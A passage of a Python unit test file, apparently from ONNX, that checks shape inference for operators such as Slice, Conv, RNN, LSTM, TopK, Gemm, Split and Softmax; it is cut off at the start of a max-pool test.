initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 4)), # 4 will be clamped to 3 since we are negative stepping
make_tensor('ends', TensorProto.INT64, (2,), (200, 0)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1)),
make_tensor('steps', TensorProto.INT64, (2,), (1, -1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))]) # type: ignore
def test_slice_variable_copy(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ("a", 2)),
('starts', TensorProto.INT64, (1,)),
('ends', TensorProto.INT64, (1,)),
('axes', TensorProto.INT64, (1,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (1,), (1,)),
make_tensor('ends', TensorProto.INT64, (1,), (200,)),
make_tensor('axes', TensorProto.INT64, (1,), (1,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ("a", 1))]) # type: ignore
def test_slice_variable_input_types(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.DOUBLE, (3, 2)),
('starts', TensorProto.INT32, (2,)),
('ends', TensorProto.INT32, (2,)),
('axes', TensorProto.INT32, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT32, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT32, (2,), (200, 22000)),
make_tensor('axes', TensorProto.INT32, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.DOUBLE, (2, 2))])
def test_conv(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('y', TensorProto.FLOAT, (5, 4, 2, 4, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (3, 5, 4, 1, 3))])
def test_conv_1d_simple(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (50, 4, 2))],
[make_node('Conv', ['x', 'y'], 'z', dilations=[1])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 4))])
def test_conv_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 4, 2))])
def test_conv_strides(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 3, 2))])
def test_conv_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 6, 6))])
def test_conv_auto_pad(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 7, 6, 4))])
def test_conv_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER', strides=[2, 2, 1])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 4, 3, 4))])
def test_conv_auto_pad_dilation(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 65, 64, 63)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER', dilations=[2, 3, 4])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 65, 64, 63))])
def test_conv_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (4, 1, 8, 8, 8))],
[make_node('Conv', ['x', 'y'], 'z', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 1, 1, 1))])
def test_conv_only_one_pos(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (50, 4, 5))],
[make_node('Conv', ['x', 'y'], 'z', strides=[2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 1))])
def test_conv_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, None, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, None, 6, 6))]) # type: ignore
def test_conv_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, None, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, None)])
def test_average_pool_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4))],
[make_node('AveragePool', ['x'], 'z', auto_pad='SAME_UPPER', kernel_shape=[4, 3, 2], strides=[2, 2, 1])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 4, 3, 4))])
def test_relu(self): # type: () -> None
self._identity_prop('Relu')
def test_identity(self): # type: () -> None
self._identity_prop('Identity')
def test_identity_sequence(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 5, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('Identity', ['in_sequence'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 4)), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, 4))]) # type: ignore
def test_add(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Add', ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 5))])
def test_pow(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Pow', ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 5))])
def test_bitshift(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (2, 3, 1)),
('y', TensorProto.UINT32, (2, 3, 1))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (2, 3, 1))])
def test_bitshift_broadcast_to_first(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (16, 4, 1)),
('y', TensorProto.UINT32, (1,))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (16, 4, 1))])
def test_bitshift_broadcast_to_second(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (1,)),
('y', TensorProto.UINT32, (2, 3, 1))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.UINT32, (2, 3, 1))])
def test_sum_single(self): # type: () -> None
self._identity_prop('Sum')
def test_sum_multi(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5)),
('z', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Sum', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (30, 4, 5))])
def test_sum_multi_broadcasting(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 1, 5)),
('y', TensorProto.FLOAT, ("a", 4, 1)),
('z', TensorProto.FLOAT, (4, "b"))],
[make_node('Sum', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (30, 4, 5))])
def test_sum_broadcasting_param(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ("a", 1, 5)),
('y', TensorProto.FLOAT, ("a", 4, 1))],
[make_node('Sum', ['x', 'y'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, ("a", 4, 5))])
def test_random_normal(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('RandomNormal', [], ['out'], dtype=TensorProto.DOUBLE, shape=(3, 4, 5))],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.DOUBLE, (3, 4, 5))])
def test_random_normal_like(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node('RandomNormalLike', ['X'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (2, 3, 4))])
def test_random_normal_like_with_dtype(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (2, 3, 4))],
[make_node('RandomNormalLike', ['X'], ['out'], dtype=TensorProto.DOUBLE,)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.DOUBLE, (2, 3, 4))])
def _logical_binary_op(self, op, input_type): # type: (Text, TensorProto.DataType) -> None
graph = self._make_graph(
[('x', input_type, (30, 4, 5)),
('y', input_type, (30, 4, 5))],
[make_node(op, ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def _logical_binary_op_with_broadcasting(self, op, input_type): # type: (Text, TensorProto.DataType) -> None
graph = self._make_graph(
[('x', input_type, (1, 5)),
('y', input_type, (30, 4, 5))],
[make_node(op, ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def test_logical_and(self): # type: () -> None
self._logical_binary_op('And', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('And', TensorProto.BOOL)
def test_logical_or(self): # type: () -> None
self._logical_binary_op('Or', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Or', TensorProto.BOOL)
def test_logical_xor(self): # type: () -> None
self._logical_binary_op('Xor', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Xor', TensorProto.BOOL)
def test_greater(self): # type: () -> None
self._logical_binary_op('Greater', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Greater', TensorProto.BOOL)
def test_less(self): # type: () -> None
self._logical_binary_op('Less', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Less', TensorProto.BOOL)
def test_equal(self): # type: () -> None
self._logical_binary_op('Equal', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('Equal', TensorProto.BOOL)
def test_logical_not(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.BOOL, (30, 4, 5))],
[make_node('Not', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.BOOL, (30, 4, 5))])
def test_less_or_equal(self): # type: () -> None
self._logical_binary_op('LessOrEqual', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('LessOrEqual', TensorProto.BOOL)
def test_greater_or_equal(self): # type: () -> None
self._logical_binary_op('GreaterOrEqual', TensorProto.BOOL)
self._logical_binary_op_with_broadcasting('GreaterOrEqual', TensorProto.BOOL)
def test_flatten(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (6, 20))])
def test_flatten_default_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 60))])
def test_flatten_zero_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (1, 120))])
def test_flatten_unknown_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'N', 4, 5))],
[make_node('Flatten', ['x'], ['z'], axis=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (None, 20))]) # type: ignore
def test_space_to_depth(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3, 100, 100))],
[make_node('SpaceToDepth', ['x'], ['z'], blocksize=b)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 300, 10, 10))])
def test_space_to_depth_unknown_dim(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'N', 100, 100))],
[make_node('SpaceToDepth', ['x'], ['z'], blocksize=b)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, None, 10, 10))]) # type: ignore
def test_depth_to_space(self): # type: () -> None
b = 10
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 300, 10, 10))],
[make_node('DepthToSpace', ['x'], ['z'], blocksize=b, mode='DCR')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 3, 100, 100))])
def _rnn_forward(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (1, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize)],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 1, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (1, batchsize, hiddensize))])
def test_rnn_forward(self): # type: () -> None
self._rnn_forward(64, 32, 10, 4)
def _rnn_bidirectional(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (2, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (2, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize,
direction="bidirectional")],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 2, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (2, batchsize, hiddensize))])
def test_rnn_layout(self): # type: () -> None
self._rnn_layout(64, 32, 10, 4)
self._rnn_layout(64, 32, 10, 4, 'bidirectional')
def _rnn_layout(self, seqlen, batchsize, inpsize, hiddensize, direction='forward'): # type: (int, int, int, int, Text) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (batchsize, seqlen, inpsize)),
('w', TensorProto.FLOAT, (1, hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, hiddensize, hiddensize))],
[make_node('RNN', ['x', 'w', 'r'], ['all', 'last'], hidden_size=hiddensize,
layout=1, direction=direction)],
[])
if(direction == 'bidirectional'):
num_directions = 2
else:
num_directions = 1
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (batchsize, seqlen, num_directions, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (batchsize, num_directions, hiddensize))])
def test_rnn_bidirectional(self): # type: () -> None
self._rnn_bidirectional(64, 32, 10, 4)
def _lstm_forward(self, seqlen, batchsize, inpsize, hiddensize): # type: (int, int, int, int) -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (seqlen, batchsize, inpsize)),
('w', TensorProto.FLOAT, (1, 4 * hiddensize, inpsize)),
('r', TensorProto.FLOAT, (1, 4 * hiddensize, hiddensize))],
[make_node('LSTM', ['x', 'w', 'r'], ['all', 'hidden', 'last'], hidden_size=hiddensize)],
[])
self._assert_inferred(graph, [
make_tensor_value_info('all', TensorProto.FLOAT, (seqlen, 1, batchsize, hiddensize)),
make_tensor_value_info('hidden', TensorProto.FLOAT, (1, batchsize, hiddensize)),
make_tensor_value_info('last', TensorProto.FLOAT, (1, batchsize, hiddensize))])
def test_lstm_forward(self): # type: () -> None
self._lstm_forward(64, 32, 10, 4)
def test_topk_default_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'])],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,), (2,))])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5, 2)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 5, 2))])
def test_topk(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,), (2,))])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 2, 10)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 2, 10))])
def test_topk_raw_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (1,),
vals=np.array([3], dtype='<i8').tobytes(), raw=True)]) # Feed raw bytes (force little endian ordering like onnx standard) for test purpose
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 3, 10)),
make_tensor_value_info('z', TensorProto.INT64, (3, 4, 3, 10))])
def test_topk_missing_k_value_output_rank_check(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 10)),
('k', TensorProto.INT64, (1,))],
[make_node('TopK', ['x', 'k'], ['y', 'z'], axis=2)],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.FLOAT, (None, None, None, None)), # type: ignore
make_tensor_value_info('z', TensorProto.INT64, (None, None, None, None))]) # type: ignore
def test_gemm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (7, 5)),
('y', TensorProto.FLOAT, (5, 11)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transA(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 7)),
('y', TensorProto.FLOAT, (5, 11)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transA=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transB(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (7, 5)),
('y', TensorProto.FLOAT, (11, 5)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transB=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_transA_and_transB(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 7)),
('y', TensorProto.FLOAT, (11, 5)),
('z', TensorProto.FLOAT, None)],
[make_node('Gemm', ['x', 'y', 'z'], ['out'], transA=1, transB=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (7, 11))])
def test_gemm_no_bias(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (13, 7)),
('y', TensorProto.FLOAT, (7, 17))],
[make_node('Gemm', ['x', 'y'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (13, 17))])
def test_reduce_op_shape_2_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(1, 2), keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24,))])
def test_reduce_op_shape_keep_dims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(1, 2), keepdims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24, 1, 1))])
def test_reduce_op_shape_default_value(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 1, 1))])
def test_reduce_op_shape_no_axes_do_not_keep_dims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, tuple())])
def test_reduce_op_shape_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ReduceL1', 'x', 'y', axes=(-1, -2))],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (24, 1, 1))])
def test_argmax_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=1, keepdims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (24, 1, 11))])
def test_argmax_shape_keepdims(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=0, keepdims=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (4, 11))])
def test_argmax_shape_default_value(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (1, 4, 11))])
def test_argmax_shape_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (24, 4, 11))],
[make_node('ArgMax', 'x', 'y', axis=-2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (24, 1, 11))])
def test_dropout(self): # type: () -> None
graph = self._make_graph(
[('data', TensorProto.FLOAT, (3, 4, 5,)),
('ratio', TensorProto.FLOAT, ())],
[make_node('Dropout', ['data', 'ratio'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5,))])
def test_LRN(self): # type: () -> None
self._identity_prop('LRN', alpha=0.5, beta=0.5, size=1)
def test_batch_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('mean', TensorProto.FLOAT, (4,)),
('var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'mean', 'var'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_split_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4))],
[make_node('Split', ['x'], ['y', 'z'], axis=-1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2)),
make_tensor_value_info('z', TensorProto.FLOAT, (2, 2))])
def test_split_with_split_attribute(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 4)),
('split', TensorProto.INT64, (2,))],
[make_node('Split', ['x', 'split'], ['y', 'z'], axis=1)],
[],
initializer=[make_tensor('split', TensorProto.INT64, (2,), (3, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3)),
make_tensor_value_info('z', TensorProto.FLOAT, (2, 1))])
def test_split_with_split_attribute_unknown_split_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 'a', 'b')),
('split', TensorProto.INT64, (2,))],
[make_node('Split', ['x', 'split'], ['y', 'z'], axis=1)],
[],
initializer=[make_tensor('split', TensorProto.INT64, (2,), (3, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, None, 'b')), # type: ignore
make_tensor_value_info('z', TensorProto.FLOAT, (2, None, 'b'))]) # type: ignore
def test_split_from_GLU(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7))])
def test_GLU_partial(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1),
make_node('Sigmoid', ['z'], ['a'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('a', TensorProto.FLOAT, (5, 3, 7))])
def test_GLU(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7))],
[make_node('Split', ['x'], ['y', 'z'], axis=1),
make_node('Sigmoid', ['z'], ['a']),
make_node('Mul', ['y', 'a'], ['b'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('z', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('a', TensorProto.FLOAT, (5, 3, 7)),
make_tensor_value_info('b', TensorProto.FLOAT, (5, 3, 7))])
def test_softmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('Softmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_softmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('Softmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_hardmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('Hardmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_hardmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('Hardmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_logsoftmax_2d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('LogSoftmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5))])
def test_logsoftmax_3d(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('LogSoftmax', ['x'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_logsoftmax_3d_negative_axis(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6))],
[make_node('LogSoftmax', ['x'], 'z', axis=-1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (4, 5, 6))])
def test_maxpool(self): # type: () -> None
graph = self._make_graph(
